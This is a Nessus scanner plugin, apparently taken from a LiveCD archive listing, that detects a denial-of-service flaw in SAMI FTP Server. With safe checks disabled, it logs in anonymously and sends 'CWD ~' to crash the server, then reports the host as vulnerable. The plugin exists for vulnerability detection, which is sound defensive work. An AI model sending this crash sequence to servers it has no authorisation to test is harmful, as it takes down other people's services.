home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / sami_ftp.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  82 lines

  1. #Copyright (C) 2004 Tenable Network Security
  2. #
  3.  
  4.  
  5. if(description)
  6. {
  7.  script_id(12061);
  8.  script_bugtraq_id(9657);
  9.  script_version ("$Revision: 1.5 $");
  10.  
  11.  name["english"] = "SAMI FTP Server DoS";
  12.  
  13.  script_name(english:name["english"]);
  14.  
  15.  desc["english"] = "
  16. The remote host is running SAMI FTP server.
  17.  
  18. There is a bug in the way this server handles certain FTP command 
  19. requests which may allow an attacker to trigger a remote Denial of
  20. Service (DoS) attack against the server.
  21.  
  22. See also : http://www.security-protocols.com/modules.php?name=News&file=article&sid=1746
  23. Solution : Upgrade SAMI FTP server
  24. Risk factor : High";
  25.  
  26.  
  27.  script_description(english:desc["english"]);
  28.  
  29.  
  30.  script_summary(english:"SAMI Remote DoS");
  31.  script_category(ACT_GATHER_INFO);
  32.  script_family(english:"FTP");
  33.  
  34.  
  35.  script_copyright(english:"This script is Copyright (C) 2004 Tenable Network Security");
  36.  
  37.  script_require_ports("Services/ftp", 21);
  38.  script_dependencie("find_service.nes", "ftpserver_detect_type_nd_version.nasl", "ftp_anonymous.nasl");
  39.  
  40.  exit(0);
  41. }
  42.  
  43. include("ftp_func.inc");
  44.  
  45. port = get_kb_item("Services/ftp");
  46. if(!port)port = 21;
  47. if(!get_port_state(port))exit(0);
  48.  
  49. banner = get_ftp_banner(port:port);
  50. if ( ! banner ) exit(0);
  51.  
  52. # ok, so here's what it looks like:
  53. #220-Sami FTP Server
  54. #220-
  55. #220 Features p a .
  56. #User (f00dikator:(none)): anonymous
  57. #230 Access allowed.
  58. #ftp> cd ~
  59. #Connection closed by remote host.
  60.  
  61. if( "Sami FTP Server" >< banner ) {
  62.     if (safe_checks() == 0) { 
  63.         req1 = string("USER anonymous\r\n");
  64.         req2 = string("CWD ~\r\n");
  65.         # SAMI ftp, when anonymous enabled, requires no password.... 
  66.         soc=open_sock_tcp(port);
  67.      if ( ! soc ) exit(0);
  68.         send(socket:soc, data:req1);    
  69.         r = ftp_recv_line(socket:soc);
  70.         if ( "Access allowed" >< r ) {
  71.             send(socket:soc, data:req2 );
  72.             r = recv_line(socket:soc, length:64, timeout:3);
  73.         close(soc);
  74.             if (!r) security_hole(port);
  75.         }
  76.     } else {
  77.         security_hole(port);
  78.     }
  79. }
  80.  
  81.  
  82.